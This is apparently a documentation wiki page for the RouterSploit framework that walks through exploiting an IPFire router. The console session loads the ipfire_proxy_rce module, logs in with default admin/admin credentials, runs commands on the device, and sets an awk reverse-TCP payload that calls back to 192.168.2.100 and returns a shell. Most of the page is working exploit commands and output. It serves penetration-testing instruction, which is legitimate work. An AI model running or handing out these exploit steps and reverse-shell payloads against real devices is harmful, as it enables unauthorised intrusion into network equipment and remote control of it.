Exploiting Target
Marcin Bury edited this page Oct 14, 2018
·
3 revisions
rsf > use exploits/routers/ipfire/ipfire_proxy_rce
rsf (IPFire Proxy RCE) > set target 192.168.2.88
[+] target => 192.168.2.88
rsf (IPFire Proxy RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
ssl true SSL enabled: true/false
target 192.168.2.88 Target IPv4 or IPv6 address
port 444 Target HTTP port
Module options:
Name Current settings Description
---- ---------------- -----------
verbosity true Verbosity enabled: true/false
username admin Username to log in with
password admin Password to log in with
rsf (IPFire Proxy RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > uname -a
[*] Executing 'uname -a' on the device...
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux
cmd > show payloads
[*] Available payloads:
Payload Name Description
------- ---- -----------
awk_bind_udp Awk Bind UDP Creates an interactive udp bind shell by using (g)awk.
awk_bind_tcp Awk Bind TCP Creates an interactive tcp bind shell by using (g)awk.
awk_reverse_tcp Awk Reverse TCP Creates an interactive tcp reverse shell by using (g)awk.
cmd > set payload awk_reverse_tcp
cmd (Awk Reverse TCP) > show options
Payload Options:
Name Current settings Description
---- ---------------- -----------
lhost Connect-back IP address
lport 5555 Connect-back TCP Port
encoder Encoder
cmd awk Awk binary
cmd (Awk Reverse TCP) > set lhost 192.168.2.100
lhost => 192.168.2.100
cmd (Awk Reverse TCP) > run
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.2.88:48775
[+] Enjoy your shell
id
uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
Communication